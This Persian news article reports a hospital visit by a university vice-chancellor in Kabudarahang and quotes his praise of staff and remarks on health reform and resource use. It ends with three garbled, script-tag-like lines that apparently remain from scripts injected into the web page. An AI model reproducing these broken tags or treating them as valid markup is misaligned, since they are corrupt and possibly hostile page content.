دیدار صمیمی معاون توسعه مدیریت و منابع دانشگاه با متخصصان و کارکنان درمانی بیمارستان امام رضا(ع) کبودرآهنگ

معاون توسعه مدیریت و منابع دانشگاه با متخصصان مقیم و کارکنان پرستاری و درمانی بیمارستان امام رضا(ع) کبودرآهنگ در نشستی صمیمی دیدار کرد.

مهندس بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه به متخصصان مقیم و کارکنان پرستاری و درمانی بیمارستان امام رضا(ع) کبودرآهنگ در نشستی صمیمی دیدار کرد و در خصوص مشکلات و رفع نیاز‌های آنان به بحث و تبادل نظر پرداخت.

بهروز رحیمی با اشاره به نقش پرنگ پزشکان، پرستاران و کارکنان در حوزه‌های مختلف درمانی افزود: پزشکان و پرستاران دو بال قدرتمند و پر اهمیت از بدنه حوزه‌های مختلف درمان هستند که تمام تلاش خود را برای سلامتی مردم جامعه در طبق اخلاص گذاشته‌اند که بسیار قابل احترام هستند.

وی در ادامه افزود: یکی از مهمترین دیدگاه‌هایی که باید به آن اهمیت داده شود، توجه به مردم در قالب خدمات درمانی کامل، ارزان و البته مهربانانه است، چرا که مردم شریف کشور عزیزمان ایران مستحق بهترین و کاملترین خدمات در حوزه سلامت هستند که به برکت طرح تحول نظام سلامت این اتفاق محقق شده است.

معاون توسعه مدیریت و منابع دانشگاه اظهار داشت: اگر هر یک از کارکنان در قالب مدیریتی عاقلانه و گروهی بهترین نقش را ایفا کنند، قطعا اثرات مثبتی را بر سیستم بهداشتی و درمانی خواهند گذاشت و این مهم، یکی از استراتژیک‌ترین موضوعات طرح تحول نظام سلامت است.

بهروز رحیمی تاکید کرد که باید حس نو‌دوستی و انسان‌دوستانه را در میان کارکنان درمانی همانند سابق افزایش داده شود تا کارها به آسانی و با علاقه پیش برود و مردم نیز از نظر روحی، احساس بهتری را در محیط های درمانی کسب کنند و آرامش بیشتری در محیط حاکم شود و این امر باعث حس تمرکز بیشتر کاری در میان کارکنان درمانی خواهد بود.

وی در ادامه افزود: پزشکان، پرستاران و تمام کارکنان درمانی و بهداشتی نقش بسیار مهم و قابل توجهی در مدیریت منابع و مصارف دارند و اگر این مدیریت به نحو صحیح انجام شود از هدر رفت منابع جلوگیری خواهد شد.

مهندس بهروز رحیمی معاون توسعه مدیریت و منابع دانشگاه سپس به پرسش‌های کارکنان درمانی بیمارستان امام رضا (ع) کبودرآهنگ پاسخ داد و نقاط قوت و قابل بهبود در رفع مشکلات بیان شد.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>